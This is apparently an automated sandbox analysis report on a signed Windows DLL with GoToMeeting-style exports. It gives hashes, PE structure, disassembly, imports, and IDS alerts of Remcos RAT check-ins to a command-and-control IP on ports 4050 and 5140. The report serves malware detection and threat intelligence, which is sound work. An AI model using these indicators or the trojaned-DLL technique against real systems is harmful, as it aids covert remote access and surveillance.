                                MD5:6d5a39ffb948ce7ff8744e302201f711
                                SHA1:af806feeb69690f4963eaa146c1debb67a45895d
                                SHA256:8e521953f01b56f163a5d7ca777cdbef86f1d9291bf994d3ba35cb0e89729da0
                                SHA512:bc2869463865c220800279cd4973633daeda05484fcf172ac4c5750eb7e215b88dffa195e51aafdf4193a5f5d182859966d70d1e1fcd3b6bd6a3f5d0663f0b00
                                SSDEEP:196608:i0ivGTAslgbSYBsnBho/wnBvq+4rMOblxz6qYFS1qY2aubxi58/EUxFFVsmN:izvfaEog+4rdbUTFVRN
                                TLSH:F1F6BF53BBD788BCE2BA16F06838A12A95B9FE700734C1DF7594590DAB31EC2D532352
                                File Content Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$...........X.s.X.s.X.s.....[.s.F...P.s.]...[.s.n.x.Z.s...y...s...y.U.s...x.u.s.....Q.s...,.L.s..<....s.Q...I.s.].,...s..<....s..<..q.s

                                File Icon

                                Icon Hash:17339671d696130e

                                Static PE Info

                                General

                                Entrypoint:0x102682d4
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x10000000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x4EC192BA [Mon Nov 14 22:14:18 2011 UTC]
                                TLS Callbacks:0x108c4ac0
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:256f838536a40e4b7c75c6cc601f59e9

                                Authenticode Signature

                                Signature Valid:
                                Signature Issuer:
                                Signature Validation Error:
                                Error Number:
                                Not Before, Not After
                                  Subject Chain
                                    Version:
                                    Thumbprint MD5:
                                    Thumbprint SHA-1:
                                    Thumbprint SHA-256:
                                    Serial:

                                    Entrypoint Preview

                                    Instruction
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    cmp dword ptr [ebp+0Ch], 01h
                                    call 00007F7758B584E6h
                                    add byte ptr [eax], al
                                    push dword ptr [ebp+08h]
                                    mov ecx, dword ptr [ebp+10h]
                                    mov edx, dword ptr [ebp+0Ch]
                                    call 00007F7758DB38E1h
                                    pop ecx
                                    pop ebp
                                    retn 000Ch
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    mov eax, dword ptr [ebp+08h]
                                    mov edx, eax
                                    mov cx, word ptr [eax]
                                    inc eax
                                    inc eax
                                    test cx, cx
                                    jne 00007F7758DB39E8h
                                    mov cx, word ptr [ebp+0Ch]
                                    dec eax
                                    dec eax
                                    cmp eax, edx
                                    je 00007F7758DB39F7h
                                    cmp word ptr [eax], cx
                                    jne 00007F7758DB39E7h
                                    cmp word ptr [eax], cx
                                    je 00007F7758DB39F4h
                                    xor eax, eax
                                    pop ebp
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push edi
                                    push esi
                                    mov esi, dword ptr [ebp+0Ch]
                                    mov ecx, dword ptr [ebp+10h]
                                    mov edi, dword ptr [ebp+08h]
                                    mov eax, ecx
                                    mov edx, ecx
                                    add eax, esi
                                    cmp edi, esi
                                    jbe 00007F7758DB39FAh
                                    cmp edi, eax
                                    jc 00007F7758DB3B9Ah
                                    cmp ecx, 00000100h
                                    jc 00007F7758DB3A11h
                                    cmp dword ptr [10EC5BDCh], 00000000h
                                    je 00007F7758DB3A08h
                                    push edi
                                    push esi
                                    and edi, 0Fh
                                    and esi, 0Fh
                                    cmp edi, esi
                                    pop esi
                                    pop edi
                                    jne 00007F7758DB39FAh
                                    pop esi
                                    pop edi
                                    pop ebp
                                    jmp 00007F7758DBE39Ah
                                    test edi, 00000003h
                                    jne 00007F7758DB3A07h
                                    shr ecx, 02h
                                    and edx, 03h
                                    cmp ecx, 08h
                                    jc 00007F7758DB3A1Ch
                                    rep movsd
                                    jmp dword ptr [102684A4h+edx*4]
                                    nop
                                    mov eax, edi
                                    mov edx, 00000003h

                                    Rich Headers

                                    Programming Language:
                                    • [C++] VS2008 build 21022
                                    • [C++] VS2003 (.NET) build 3077
                                    • [C++] VS98 (6.0) SP6 build 8804
                                    • [ C ] VS98 (6.0) build 8168
                                    • [C++] VS98 (6.0) build 8168
                                    • [C++] VS2003 (.NET) SP1 build 6030
                                    • [ C ] VS2003 (.NET) SP1 build 6030
                                    • [C++] VS2005 build 50727
                                    • [ C ] VS2003 (.NET) build 3077
                                    • [ASM] VS2005 build 50727
                                    • [ C ] VS2005 build 50727
                                    • [ASM] VS2008 SP1 build 30729
                                    • [IMP] VS2005 build 50727
                                    • [C++] VS2008 SP1 build 30729
                                    • [ C ] VS2008 SP1 build 30729
                                    • [EXP] VS2008 SP1 build 30729
                                    • [RES] VS2008 build 21022
                                    • [LNK] VS2008 SP1 build 30729

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0xe1ba200x2ef.rdata
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xe18b400x1f4.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xec80000xc7810.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xef20000x1578.rsrc
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xed00000x81884.rsrc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xbe5ac00x1c.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0xdc79440x18.rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0xbe40000x8cc.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xe16d8c0xc0.rdata
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000xbe20000xbe1e00960883c097e737a959b44d0f56c4ddf9unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .orpc0xbe30000x10000x8009b14263b8faf3c96646355f3c8dfd420False0.27490234375data5.138237723287718IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0xbe40000x2380000x237e00b216362d81cbc191bb555df2bba83da5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xe1c0000xab0000x2ec00d9c87173298748538f8d712472c746b4False0.2606951871657754data5.61955411378293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .tls0xec70000x10000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0xec80000xc78100xc7a005231603992ad2ad23fbe9c02af4dcc0dFalse0.6501264578115216data7.478090400985154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    REGISTRY0xec84840xfcASCII text, with CRLF line terminatorsEnglishUnited States0.7619047619047619
                                    RT_BITMAP0xec85800x78a36PC bitmap, Windows 3.x format, 62726 x 2 x 37, image size 494286, cbSize 494134, bits offset 540.7526419958958501
                                    RT_ICON0xf40fb80xb118PC bitmap, Windows 3.x format, 5924 x 2 x 38, image size 45913, cbSize 45336, bits offset 540.49649285336156695
                                    RT_ICON0xf4c0d00x7ce8PC bitmap, Windows 3.x format, 4804 x 2 x 38, image size 32060, cbSize 31976, bits offset 540.4609394545909432
                                    RT_ICON0xf53db80x4b44PC bitmap, Windows 3.x format, 3286 x 2 x 44, image size 20056, cbSize 19268, bits offset 540.5784720780568818
                                    RT_ICON0xf588fc0x300dbPC bitmap, Windows 3.x format, 25213 x 2 x 41, image size 197229, cbSize 196827, bits offset 540.47846078027912836
                                    RT_ICON0xf889d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.47297297297297297
                                    RT_ICON0xf88b000x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.7355491329479769
                                    RT_ICON0xf890680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.7327188940092166
                                    RT_ICON0xf897300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.7522563176895307
                                    RT_ICON0xf89fd80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.6551172707889126
                                    RT_ICON0xf8ae800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6179078014184397
                                    RT_ICON0xf8b2e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6098360655737705
                                    RT_ICON0xf8bc700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.551829268292683
                                    RT_ICON0xf8cd180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.520643153526971
                                    RT_STRING0xf8f2c00x30dataEnglishUnited States0.6458333333333334
                                    RT_GROUP_ICON0xf8f2f00x84dataEnglishUnited States0.6590909090909091
                                    RT_VERSION0xf8f3740x340dataEnglishUnited States0.4483173076923077
                                    RT_MANIFEST0xf8f6b40x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786

                                    Imports

                                    DLLImport
                                    RPCRT4.dllNdrDllGetClassObject, RpcStringFreeW, UuidToStringW, NdrOleAllocate, NdrOleFree, IUnknown_QueryInterface_Proxy, IUnknown_AddRef_Proxy, IUnknown_Release_Proxy, CStdStubBuffer_QueryInterface, CStdStubBuffer_AddRef, CStdStubBuffer_Connect, CStdStubBuffer_Disconnect, CStdStubBuffer_Invoke, CStdStubBuffer_IsIIDSupported, CStdStubBuffer_CountRefs, CStdStubBuffer_DebugServerQueryInterface, CStdStubBuffer_DebugServerRelease, NdrCStdStubBuffer_Release, UuidCreate
                                    NETAPI32.dllNetbios
                                    PSAPI.DLLEnumProcesses, GetModuleBaseNameW, EnumProcessModules, GetModuleFileNameExW, GetModuleInformation
                                    SHLWAPI.dllPathRemoveExtensionW, PathStripPathW, StrFormatByteSizeW, StrChrW
                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                    MSACM32.dllacmStreamOpen, acmStreamConvert, acmStreamUnprepareHeader, acmStreamPrepareHeader
                                    POWRPROF.dllCallNtPowerInformation
                                    WININET.dllInternetReadFileExA, HttpOpenRequestW, InternetSetStatusCallbackW, HttpQueryInfoW, InternetSetOptionW, InternetOpenW, HttpSendRequestExW, InternetQueryOptionW, InternetCloseHandle, InternetConnectW, InternetErrorDlg, HttpEndRequestW
                                    KERNEL32.dllCopyFileW, GetFileAttributesW, GetDiskFreeSpaceExW, GetTempFileNameW, FindFirstFileW, MoveFileW, GetSystemWindowsDirectoryW, GetLocaleInfoW, GetSystemInfo, GlobalMemoryStatusEx, lstrlenA, LocalAlloc, lstrcmpiW, ReleaseMutex, CreateMutexW, ResumeThread, GetThreadContext, SuspendThread, InterlockedIncrement, SetThreadPriority, GetThreadPriority, TerminateThread, CreateProcessW, TerminateProcess, GetExitCodeProcess, GetShortPathNameW, CompareFileTime, CreateDirectoryW, RemoveDirectoryW, GetSystemDirectoryW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetLocalTime, InitializeCriticalSection, DeleteCriticalSection, TryEnterCriticalSection, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetProcessTimes, GetTickCount, GetTimeFormatW, GetDateFormatW, GetTimeZoneInformation, QueryPerformanceCounter, QueryPerformanceFrequency, ResetEvent, OpenEventW, CreateEventW, FindVolumeClose, FindNextVolumeW, QueryDosDeviceW, FindFirstVolumeW, FindNextFileW, DeleteFileW, GetUserDefaultLCID, GetUserDefaultUILanguage, EnumResourceLanguagesW, OpenThread, GetThreadTimes, DisableThreadLibraryCalls, InterlockedDecrement, lstrlenW, SizeofResource, LoadResource, FindResourceW, OpenMutexW, SetEnvironmentVariableW, GetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathA, CreateDirectoryA, SetLastError, SetWaitableTimer, CreateWaitableTimerW, WritePrivateProfileStringW, GetPrivateProfileStringW, VirtualFree, VirtualAlloc, GlobalLock, GlobalFree, GlobalUnlock, GlobalAlloc, FlushInstructionCache, lstrcmpW, MulDiv, LockResource, GetVersionExA, ExpandEnvironmentStringsW, GetFileTime, ExitProcess, Thread32Next, Thread32First, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, SetThreadExecutionState, FlushFileBuffers, SetEndOfFile, SetFilePointer, WriteFile, ReadFile, FindClose, OpenProcess, GetCurrentThread, InterlockedExchange, MultiByteToWideChar, WideCharToMultiByte, GetSystemTime, SystemTimeToFileTime, FileTimeToSystemTime, TlsFree, HeapFree, HeapAlloc, HeapDestroy, HeapCreate, GetCurrentThreadId, GetTempPathW, CreateFileW, GetCurrentProcessId, GetFileSize, CreateFileMappingW, MapViewOfFile, SetEvent, WaitForSingleObject, UnmapViewOfFile, CloseHandle, GetSystemTimeAsFileTime, CreateEventA, LoadLibraryExW, OutputDebugStringW, LocalFree, GetLastError, SetUnhandledExceptionFilter, GetVersionExW, LoadLibraryW, Sleep, GetCurrentProcess, GetModuleFileNameW, FormatMessageW, IsBadReadPtr, GetModuleHandleW, GetProcAddress, TlsAlloc, TlsSetValue, TlsGetValue, RaiseException, FreeLibrary, FileTimeToLocalFileTime, GetDriveTypeA, ReadConsoleInputA, SetConsoleMode, LCMapStringA, InitializeCriticalSectionAndSpinCount, SetConsoleCtrlHandler, CompareStringW, GetDateFormatA, GetTimeFormatA, HeapReAlloc, GetFullPathNameA, PeekNamedPipe, GetCurrentDirectoryA, FoldStringW, GetConsoleMode, GetConsoleCP, HeapSize, GetModuleHandleA, LCMapStringW, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, GetStartupInfoA, GetFileType, GetStdHandle, SetHandleCount, RtlUnwind, CreateThread, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA, GetProcessHeap, CompareStringA, SetEnvironmentVariableA, InterlockedCompareExchange, IsProcessorFeaturePresent, GetCommandLineW, ReleaseSemaphore, CreateSemaphoreW, GetVolumeInformationW, DuplicateHandle, GetVersion, ExitThread, IsDebuggerPresent, UnhandledExceptionFilter, GetCommandLineA, GetPrivateProfileSectionNamesW, FindFirstFileA, GlobalMemoryStatus, LoadLibraryA, GetSystemDefaultLCID, GetPrivateProfileSectionW, CancelWaitableTimer, DeleteFileA, GetFileAttributesExA, SetThreadAffinityMask, GetProcessAffinityMask, CreateWaitableTimerA, OutputDebugStringA, AllocConsole, FreeConsole, FormatMessageA, CreateSemaphoreA, SetPriorityClass, CreateMutexA, GetFileInformationByHandle, FlushConsoleInputBuffer
                                    GDI32.dllCreateDCW, GetRegionData, ExtTextOutW, OffsetRgn, GetRgnBox, EqualRgn, CreateBitmap, SetROP2, FillRgn, CreateRectRgnIndirect, DPtoLP, Ellipse, RestoreDC, Polyline, SaveDC, CreatePen, SetPolyFillMode, GetSystemPaletteEntries, CreatePalette, GetPaletteEntries, GetDIBColorTable, SetDIBColorTable, CreateDIBSection, GetDCOrgEx, Polygon, FrameRgn, PaintRgn, CreatePolygonRgn, CreateRoundRectRgn, SetStretchBltMode, StretchBlt, GetDIBits, CreateDIBitmap, SetDIBits, SelectClipRgn, ExcludeClipRect, SetMapMode, SetWindowExtEx, SetViewportExtEx, SetWindowOrgEx, SetViewportOrgEx, LineTo, MoveToEx, GetClipBox, SetPixelV, GetTextMetricsW, GetTextExtentPoint32W, SetBkColor, CreateRectRgn, SetRectRgn, CombineRgn, GetBitmapBits, SetTextColor, TextOutW, GetBkMode, GetTextColor, CreateFontW, CreateFontIndirectW, GetStockObject, GetObjectW, GetDeviceCaps, BitBlt, CreateSolidBrush, GetPixel, SetBkMode, SetBrushOrgEx, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, CreatePatternBrush, DeleteDC, DeleteObject, SetPixel
                                    COMDLG32.dllGetOpenFileNameW, CommDlgExtendedError, ChooseColorW, GetSaveFileNameW
                                    ole32.dllCoGetCallContext, CoRevokeClassObject, CoRegisterClassObject, CoInitializeSecurity, CoGetObject, CoDisconnectObject, CoGetCurrentProcess, CoCreateFreeThreadedMarshaler, CoTaskMemFree, CoTaskMemAlloc, CoFreeUnusedLibraries, StringFromGUID2, CoCreateInstance, CoCreateGuid, CLSIDFromProgID, OleLockRunning, CoGetClassObject, CLSIDFromString, CreateStreamOnHGlobal, CoInitialize, CoSetProxyBlanket, OleUninitialize, CoUninitialize, CoInitializeEx, CoTaskMemRealloc, OleInitialize, CoRegisterPSClsid, StringFromCLSID
                                    OLEAUT32.dllSystemTimeToVariantTime, UnRegisterTypeLib, LoadTypeLib, SysAllocString, SysFreeString, SysStringLen, RegisterTypeLib, VarUI4FromStr, LPSAFEARRAY_UserSize, LPSAFEARRAY_UserMarshal, LPSAFEARRAY_UserUnmarshal, OleCreateFontIndirect, LoadRegTypeLib, OleLoadPicture, LPSAFEARRAY_UserFree, SysStringByteLen, SysAllocStringLen, BSTR_UserUnmarshal, DispCallFunc, BSTR_UserFree, SafeArrayGetElement, SafeArrayDestroy, SafeArrayPutElement, SafeArrayCreate, SysAllocStringByteLen, VariantCopy, BSTR_UserSize, OleCreatePropertyFrame, VariantInit, VarBstrCat, VarBstrCmp, OleLoadPicturePath, BSTR_UserMarshal, VariantClear, VariantChangeType
                                    Secur32.dllGetUserNameExW, InitSecurityInterfaceA
                                    WTSAPI32.dllWTSQuerySessionInformationW, WTSFreeMemory
                                    COMCTL32.dllInitCommonControlsEx
                                    USERENV.dllDestroyEnvironmentBlock, CreateEnvironmentBlock
                                    WINMM.dllmixerGetDevCapsA, mixerGetLineControlsA, mixerGetLineInfoA, waveInGetDevCapsA, waveOutGetDevCapsA, mixerGetControlDetailsA, timeSetEvent, timeGetTime, timeKillEvent, mmioOpenA, timeEndPeriod, timeBeginPeriod, waveInUnprepareHeader, waveInReset, waveInPrepareHeader, waveInAddBuffer, waveInStart, waveInStop, waveInGetErrorTextW, waveInGetPosition, mmioOpenW, mmioDescend, mmioAscend, waveOutUnprepareHeader, waveOutReset, waveOutPrepareHeader, mmioRead, waveOutPause, waveOutWrite, mmioClose, mixerGetNumDevs, mixerOpen, mixerSetControlDetails, mixerGetLineInfoW, mixerGetDevCapsW, waveInOpen, waveOutOpen, waveOutGetPosition, waveOutClose, mixerGetID, waveInGetID, waveOutGetID, mixerGetLineControlsW, mixerGetControlDetailsW, waveOutGetNumDevs, waveInGetNumDevs, waveInGetDevCapsW, waveOutGetDevCapsW, mixerClose, waveOutGetVolume, waveOutSetVolume, waveInClose
                                    AVIFIL32.dllAVIStreamWrite, AVIFileInit, AVIFileExit, AVIFileRelease, AVIFileCreateStreamA, AVIStreamRead, AVIStreamTimeToSample, AVIStreamSampleToTime, AVIStreamFindSample, AVIStreamLength, AVIStreamReadFormat, AVIStreamRelease, AVIStreamSetFormat, AVIFileOpenA, AVIFileGetStream, AVIFileInfoA
                                    MSVFW32.dllICOpen, ICDecompress, ICSendMessage, ICClose
                                    AVICAP32.dllcapGetDriverDescriptionA, capCreateCaptureWindowA
                                    d3d9.dllDirect3DCreate9
                                    WSOCK32.dllrecvfrom, htonl, getsockname, gethostname, getsockopt, inet_ntoa, select, WSACleanup, closesocket, shutdown, WSAGetLastError, recv, WSASetLastError, send, inet_addr, ntohs, sendto, htons, ioctlsocket, WSAStartup, gethostbyname, ntohl, socket, setsockopt, accept, listen, bind, connect, getpeername, __WSAFDIsSet
                                    WS2_32.dllWSAWaitForMultipleEvents, WSAResetEvent, WSAEnumNetworkEvents, WSACreateEvent, WSACloseEvent, WSASetEvent, WSAEventSelect, getnameinfo, WSAIoctl

                                    Exports

                                    NameOrdinalAddress
                                    DllCanUnloadNow50x1000bf07
                                    DllGetClassObject60x1000bef0
                                    DllRegisterServer70x1000bf0c
                                    DllUnregisterServer80x1000bf1e
                                    g2mchat_winmain90x1000c09e
                                    g2mcomm_winmain100x1000bfc6
                                    g2mfeedback_winmain110x1000c0ef
                                    g2mhost_winmain120x1000c068
                                    g2minstaller_winmain130x1000c140
                                    g2minsthigh_winmain140x1000c140
                                    g2mlauncher_winmain150x1000bffc
                                    g2mmatchmaking_winmain160x1000c017
                                    g2mmaterials_winmain10x1000c10a
                                    g2mpolling_winmain170x1000c0b9
                                    g2mqanda_winmain180x1000c0d4
                                    g2mrecorder_winmain190x1000c15b
                                    g2msessioncontrol_winmain200x1000c032
                                    g2mstart_winmain210x1000bfe1
                                    g2mtesting_winmain20x1000c125
                                    g2mtranscoder_winmain30x1000c191
                                    g2mui_winmain220x1000c04d
                                    g2muninstall_winmain230x1000c140
                                    g2mvideoconference_winmain40x1000c176
                                    g2mview_winmain240x1000c083

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-18T12:15:02.559383+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449735193.233.18.184050TCP
                                    2024-10-18T12:15:11.097889+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449737193.233.18.185140TCP
                                    2024-10-18T12:15:20.607977+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449774193.233.18.184050TCP
                                    2024-10-18T12:15:29.097370+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449817193.233.18.185140TCP
                                    2024-10-18T12:15:38.607134+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449858193.233.18.184050TCP
                                    2024-10-18T12:15:47.106960+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449907193.233.18.185140TCP
                                    2024-10-18T12:15:56.591358+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449960193.233.18.184050TCP
                                    2024-10-18T12:16:05.072729+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450009193.233.18.185140TCP
                                    2024-10-18T12:16:14.593568+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450010193.233.18.184050TCP
                                    2024-10-18T12:16:23.135021+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450011193.233.18.185140TCP
                                    2024-10-18T12:16:32.623415+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450012193.233.18.184050TCP
                                    2024-10-18T12:16:41.126552+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450013193.233.18.185140TCP
                                    2024-10-18T12:16:50.623194+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450014193.233.18.184050TCP
                                    2024-10-18T12:16:59.110987+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450015193.233.18.185140TCP
                                    2024-10-18T12:17:08.610567+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450016193.233.18.184050TCP
                                    2024-10-18T12:17:17.410636+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450017193.233.18.185140TCP
                                    2024-10-18T12:17:26.922102+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450018193.233.18.184050TCP
                                    2024-10-18T12:17:35.424734+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450019193.233.18.185140TCP
                                    2024-10-18T12:17:44.936419+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450020193.233.18.184050TCP
                                    2024-10-18T12:17:53.425586+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450021193.233.18.185140TCP
                                    2024-10-18T12:18:02.923601+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450022193.233.18.184050TCP
                                    2024-10-18T12:18:11.425822+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450023193.233.18.185140TCP
                                    2024-10-18T12:18:21.003692+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450024193.233.18.184050TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 18, 2024 12:15:02.553214073 CEST497354050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:02.558263063 CEST405049735193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:02.558336020 CEST497354050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:02.559382915 CEST497354050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:02.564260006 CEST405049735193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:11.068687916 CEST405049735193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:11.068965912 CEST497354050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:11.069315910 CEST497354050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:11.074127913 CEST405049735193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:11.092335939 CEST497375140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:11.097234964 CEST514049737193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:11.097347975 CEST497375140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:11.097888947 CEST497375140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:11.102897882 CEST514049737193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:19.587183952 CEST514049737193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:19.588689089 CEST497375140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:19.588769913 CEST497375140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:19.593607903 CEST514049737193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:20.602236986 CEST497744050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:20.607151985 CEST405049774193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:20.607234001 CEST497744050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:20.607976913 CEST497744050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:20.612890959 CEST405049774193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:29.090404987 CEST405049774193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:29.090477943 CEST497744050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:29.090569019 CEST497744050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:29.091841936 CEST498175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:29.095469952 CEST405049774193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:29.096868992 CEST514049817193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:29.096956015 CEST498175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:29.097369909 CEST498175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:29.102224112 CEST514049817193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:37.593373060 CEST514049817193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:37.593434095 CEST498175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:37.593532085 CEST498175140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:37.598328114 CEST514049817193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:38.601720095 CEST498584050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:38.606637001 CEST405049858193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:38.606724024 CEST498584050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:38.607134104 CEST498584050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:38.611934900 CEST405049858193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:47.100434065 CEST405049858193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:47.100503922 CEST498584050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:47.100558043 CEST498584050192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:47.101728916 CEST499075140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:47.105348110 CEST405049858193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:47.106523037 CEST514049907193.233.18.18192.168.2.4
                                    Oct 18, 2024 12:15:47.106592894 CEST499075140192.168.2.4193.233.18.18
                                    Oct 18, 2024 12:15:47.106960058 CEST499075140192.168.2.4193.233.18.18
